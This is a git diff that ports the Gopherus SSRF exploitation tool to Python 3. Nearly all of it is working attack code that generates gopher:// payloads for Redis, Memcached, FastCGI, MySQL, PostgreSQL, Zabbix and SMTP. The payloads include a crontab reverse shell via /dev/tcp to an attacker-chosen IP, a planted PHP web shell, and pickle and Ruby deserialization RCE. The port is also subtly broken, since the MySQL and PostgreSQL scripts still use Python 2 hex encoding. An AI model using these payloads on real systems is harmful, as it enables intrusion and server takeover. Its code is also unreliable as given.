diff --git a/.gitignore b/.gitignore index 0d20b64..feae5c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ *.pyc +__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index a5409db..29b16c8 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,11 @@ # Gopherus If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server. And for more information you can get a blog on the same [Blog on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) + +## Note : + +This repo is a fork from the Original Tool but I have updated the code from python2 to python3 (because python2 is dead) and added a new feature to select the port for the reverse shell(Redis). + ## About This tool can generate payload for following: 1. MySQL (Port-3306) diff --git a/gopherus.py b/gopherus.py deleted file mode 100755 index e7dd713..0000000 --- a/gopherus.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/python2 -import argparse -import sys -sys.path.insert(0,'./scripts/') -from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix - -parser = argparse.ArgumentParser() -parser.add_argument("--exploit", - help="mysql,\n" - "postgresql,\n" - "fastcgi,\n" - "redis,\n" - "smtp,\n" - "zabbix,\n" - "pymemcache,\n" - "rbmemcache,\n" - "phpmemcache,\n" - "dmpmemcache") -args = parser.parse_args() - -class colors: - reset='\033[0m' - red='\033[31m' - green='\033[32m' - orange='\033[33m' - blue='\033[34m' - -print colors.green + """ - - ________ .__ - / _____/ ____ ______ | |__ ___________ __ __ ______ -/ \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ -\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ - \______ /\____/| __/|___| /\___ >__| |____//____ > - \/ |__| \/ \/ \/ -""" + "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset - -if(not args.exploit): - print parser.print_help() - exit() - -if(args.exploit=="mysql"): - MySQL.MySQL() -elif(args.exploit=="postgresql"): - PostgreSQL.PostgreSQL() -elif(args.exploit=="fastcgi"): - FastCGI.FastCGI() -elif(args.exploit=="redis"): - Redis.Redis() -elif(args.exploit=="smtp"): - SMTP.SMTP() -elif(args.exploit=="zabbix"): - Zabbix.Zabbix() -elif(args.exploit=="dmpmemcache"): - DumpMemcached.DumpMemcached() -elif(args.exploit=="phpmemcache"): - PHPMemcached.PHPMemcached() -elif(args.exploit=="rbmemcache"): - RbMemcached.RbMemcached() -elif(args.exploit=="pymemcache"): - PyMemcached.PyMemcached() -else: - print parser.print_help() diff --git a/gopherus3.py b/gopherus3.py new file mode 100755 index 0000000..6dc9b28 --- /dev/null +++ b/gopherus3.py @@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +import argparse +import sys +sys.path.insert(0, './scripts/') +from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix + + +class colors: + reset='\033[0m' + red='\033[31m' + green='\033[32m' + orange='\033[33m' + blue='\033[34m' + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("--exploit", + help="mysql,\n" + "postgresql,\n" + "fastcgi,\n" + "redis,\n" + "smtp,\n" + "zabbix,\n" + "pymemcache,\n" + "rbmemcache,\n" + "phpmemcache,\n" + "dmpmemcache") + args = parser.parse_args() + print(colors.green + """ + ________ .__ ________ + / _____/ ____ ______ | |__ ___________ __ __ ______ \_____ \ + / \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ _(__ < + \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ / \\ + \______ /\____/| __/|___| /\___ >__| |____//____ > /______ / + \/ |__| \/ \/ \/ \/ + """+ "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset) + + if(not args.exploit): + print(parser.print_help()) + sys.exit(1) + + if(args.exploit=="mysql"): + MySQL.MySQL() + elif(args.exploit=="postgresql"): + PostgreSQL.PostgreSQL() + elif(args.exploit=="fastcgi"): + FastCGI.FastCGI() + elif(args.exploit=="redis"): + Redis.Redis() + elif(args.exploit=="smtp"): + SMTP.SMTP() + elif(args.exploit=="zabbix"): + Zabbix.Zabbix() + elif(args.exploit=="dmpmemcache"): + DumpMemcached.DumpMemcached() + elif(args.exploit=="phpmemcache"): + PHPMemcached.PHPMemcached() + elif(args.exploit=="rbmemcache"): + RbMemcached.RbMemcached() + elif(args.exploit=="pymemcache"): + PyMemcached.PyMemcached() + else: + print(parser.print_help()) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/install.sh b/install.sh index 96408f2..9a7e4d9 100755 --- a/install.sh +++ b/install.sh @@ -1,5 +1,6 @@ #!/bin/bash -python2 -m pip install argparse -python2 -m pip install requests -chmod +x gopherus.py -ln -sf $(pwd)/gopherus.py /usr/local/bin/gopherus + +pip3 install -r requirements.txt +chmod +x gopherus3.py +sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3 +echo "Gopherus3 installed" diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..05f27b4 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +argparse +requests \ No newline at end of file diff --git a/scripts/DumpMemcached.py b/scripts/DumpMemcached.py index cd7a24f..6d74416 100644 --- a/scripts/DumpMemcached.py +++ b/scripts/DumpMemcached.py @@ -1,12 +1,12 @@ -import urllib +import urllib.parse def DumpMemcached(): - code = raw_input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m") + code = input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m") - payload = urllib.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + payload = urllib.parse.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") finalpayload = "gopher://127.0.0.1:11211/_%0d%0a" + payload + "%0d%0a" - print "\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m" - print finalpayload - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m" + print("\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m") + print(finalpayload) + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m") diff --git a/scripts/FastCGI.py b/scripts/FastCGI.py index edf6b12..5708740 100644 --- a/scripts/FastCGI.py +++ b/scripts/FastCGI.py @@ -1,12 +1,12 @@ -import urllib +import urllib.parse def FastCGI(): - filename = raw_input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") + filename = input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") if(not filename): filename="/usr/share/php/PEAR.php" - command=raw_input("\033[96m" +"Terminal command to run: "+ "\033[0m") + command=input("\033[96m" +"Terminal command to run: "+ "\033[0m") length=len(command)+52 char=chr(length) @@ -25,10 +25,11 @@ def FastCGI(): payload = start + data + end - def get_payload(payload): - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/") - return "gopher://127.0.0.1:9000/_" + finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m") + print("\033[04m" + get_payload(payload)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m" - print "\033[04m" + get_payload(payload)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/") + return "gopher://127.0.0.1:9000/_" + finalpayload \ No newline at end of file diff --git a/scripts/MySQL.py b/scripts/MySQL.py index 8353f9b..690c8ff 100644 --- a/scripts/MySQL.py +++ b/scripts/MySQL.py @@ -1,7 +1,6 @@ - def MySQL(): - print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m" - user = raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m") + print("\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m") + user = input("\033[96m" +"\nGive MySQL username: " + "\033[0m") encode_user = user.encode("hex") user_length = len(user) temp = user_length - 4 @@ -13,26 +12,26 @@ def MySQL(): dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d" dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c" - query = raw_input("\033[96m" +"Give query to execute: "+ "\033[0m") + query = input("\033[96m" +"Give query to execute: "+ "\033[0m") auth = dump.replace("\n","") - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:3306/_%" + "%".join(a) - - - def get_payload(query): - if(query.strip()!=''): - query = query.encode("hex") - query_length = '{:06x}'.format((int((len(query) / 2) + 1))) - query_length = query_length.decode('hex')[::-1].encode('hex') - pay1 = query_length + "0003" + query - final = encode(auth + pay1 + "0100000001") - return final - else: - return encode(auth) - - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + get_payload(query)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + get_payload(query,auth)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:3306/_%" + "%".join(a) + +def get_payload(query,auth): + if(query.strip()!=''): + query = query.encode("hex") + query_length = '{:06x}'.format((int((len(query) / 2) + 1))) + query_length = query_length.decode('hex')[::-1].encode('hex') + pay1 = query_length + "0003" + query + final = encode(auth + pay1 + "0100000001") + return final + else: + return encode(auth) \ No newline at end of file diff --git a/scripts/PHPMemcached.py b/scripts/PHPMemcached.py index 6de9da9..34ed59c 100644 --- a/scripts/PHPMemcached.py +++ b/scripts/PHPMemcached.py @@ -1,20 +1,20 @@ -import urllib +import urllib.parse def PHPMemcached(): - print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m" + print("\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m") - code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m") + code = input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m") if(not code): - print "\033[93m" + "Plz give payload" + "\033[0m" + print("\033[93m" + "Plz give payload" + "\033[0m") exit() payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a" - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m" - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m") + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/PostgreSQL.py b/scripts/PostgreSQL.py index 16b4d68..f50ac22 100644 --- a/scripts/PostgreSQL.py +++ b/scripts/PostgreSQL.py @@ -1,7 +1,7 @@ def PostgreSQL(): - user = raw_input("\033[96m" + "PostgreSQL Username: " + "\033[0m") - db = raw_input("\033[96m" + "Database Name: " + "\033[0m") - query = raw_input("\033[96m" + "Query: " + "\033[0m") + user = input("\033[96m" + "PostgreSQL Username: " + "\033[0m") + db = input("\033[96m" + "Database Name: " + "\033[0m") + query = input("\033[96m" + "Query: " + "\033[0m") encode_user = user.encode("hex") encode_db = db.encode("hex") @@ -16,11 +16,13 @@ def PostgreSQL(): packet = start + data + end - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:5432/_%" + "%".join(a) - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + encode(packet) + "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + encode(packet) + "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:5432/_%" + "%".join(a) \ No newline at end of file diff --git a/scripts/PyMemcached.py b/scripts/PyMemcached.py index ae8f5b5..353cdb5 100644 --- a/scripts/PyMemcached.py +++ b/scripts/PyMemcached.py @@ -1,10 +1,10 @@ -import cPickle +import pickle import os -import urllib +import urllib.parse def PyMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" @@ -16,18 +16,18 @@ def __reduce__(self): if(cmd): return (os.system,(cmd,)) - command = (cPickle.dumps(PickleRCE())) + command = (pickle.dumps(PickleRCE())) - def get_payload(command): - payload = urllib.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" - return finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m" + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" +def get_payload(command): + payload = urllib.parse.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" + return finalpayload \ No newline at end of file diff --git a/scripts/RbMemcached.py b/scripts/RbMemcached.py index 3c1ffac..104d255 100644 --- a/scripts/RbMemcached.py +++ b/scripts/RbMemcached.py @@ -1,8 +1,8 @@ -import urllib +import urllib.parse def RbMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" @@ -13,17 +13,18 @@ def RbMemcached(): payload = """\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0e@instanceo:\x08ERB\x06:\t@srcI\"""" + chr(len(cmd)+10) payload += "%x(" + cmd + """);\x06:\x06ET:\x0c@method:\x0bresult:\t@varI"\x0c@result\x06;\tT:\x10@deprecatoro:\x1fActiveSupport::Deprecation\x06:\x0e@silencedT""" - def get_payload(payload): - payload_len = len(payload) - payload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" - return finalpayload - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m" - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m") + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + payload_len = len(payload) + payload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" + return finalpayload \ No newline at end of file diff --git a/scripts/Redis.py b/scripts/Redis.py index fbea515..67c5518 100644 --- a/scripts/Redis.py +++ b/scripts/Redis.py @@ -1,16 +1,30 @@ -import urllib +import urllib.parse def Redis(): - def get_Redis_ReverseShell(): - server = raw_input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") - crontab_dir = raw_input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") - if(not server): - server = "127.0.0.1" - if(not crontab_dir): - crontab_dir = "/var/spool/cron/" - cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/1234 0>&1"' - len_cmd = len(cmd) + 5 - payload = """*1\r + print("\033[01m"+"\nReady To get SHELL\n"+ "\033[0m") + what = input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") + what = what.lower() + if("rev" in what): + get_Redis_ReverseShell() + elif("php" in what): + get_Redis_PHPShell() + else: + print("\033[93m" +"Plz choose between those two"+ "\033[0m") + exit(1) + +def get_Redis_ReverseShell(): + server = input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") + port = input("\033[96m" +"\nGive your Port to connect with victim through Revershell (default is 1234): "+ "\033[0m") + crontab_dir = input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") + if(not server): + server = "127.0.0.1" + if(not crontab_dir): + crontab_dir = "/var/spool/cron/" + if(not port): + port = "1234" + cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/'+port+' 0>&1"' + len_cmd = len(cmd) + 5 + payload = """*1\r $8\r flushall\r *3\r @@ -48,23 +62,22 @@ def get_Redis_ReverseShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m" +"\nBefore sending request plz do `nc -lvp 1234`"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m" +"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - def get_Redis_PHPShell(): - web_root_location = raw_input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") - php_payload = raw_input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") - default = "" - if(not php_payload): - php_payload = default - if(not web_root_location): - web_root_location = "/var/www/html" - payload = """*1\r +def get_Redis_PHPShell(): + web_root_location = input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") + php_payload = input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") + default = "" + if(not php_payload): + php_payload = default + if(not web_root_location): + web_root_location = "/var/www/html" + payload = """*1\r $8\r flushall\r *3\r @@ -101,20 +114,8 @@ def get_Redis_PHPShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - - - print "\033[01m"+"\nReady To get SHELL\n"+ "\033[0m" - what = raw_input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") - what = what.lower() - if("rev" in what): - get_Redis_ReverseShell() - elif("php" in what): - get_Redis_PHPShell() - else: - print "\033[93m" +"Plz choose between those two"+ "\033[0m" - exit() + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/SMTP.py b/scripts/SMTP.py index a005fd0..9324127 100644 --- a/scripts/SMTP.py +++ b/scripts/SMTP.py @@ -1,11 +1,11 @@ -import urllib +import urllib.parse def SMTP(): - print "\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m" - mailfrom = raw_input("\033[96m" +"Mail from : "+ "\033[0m") - Mailto = raw_input("\033[96m" +"Mail To : "+ "\033[0m") - subject = raw_input("\033[96m" +"Subject : "+ "\033[0m") - msg = raw_input("\033[96m" +"Message : "+ "\033[0m") + print("\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m") + mailfrom = input("\033[96m" +"Mail from : "+ "\033[0m") + Mailto = input("\033[96m" +"Mail To : "+ "\033[0m") + subject = input("\033[96m" +"Subject : "+ "\033[0m") + msg = input("\033[96m" +"Message : "+ "\033[0m") commands = [ 'MAIL FROM:' + mailfrom, @@ -18,8 +18,8 @@ def SMTP(): ] payload = "%0A".join(commands) - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/Zabbix.py b/scripts/Zabbix.py index 216faed..3edf32f 100644 --- a/scripts/Zabbix.py +++ b/scripts/Zabbix.py @@ -1,15 +1,15 @@ -import urllib +import urllib.parse def Zabbix(): - print "\033[01m"+"\nExecute SHELL command: \n" + "\033[0m" - command = raw_input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m") + print("\033[01m"+"\nExecute SHELL command: \n" + "\033[0m") + command = input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m") if(not command): command = "ls" payload = "system.run[(" + command + ");sleep 2s]" - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/__init__.py b/scripts/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/scripts/__init__.py +++ /dev/null @@ -1 +0,0 @@ -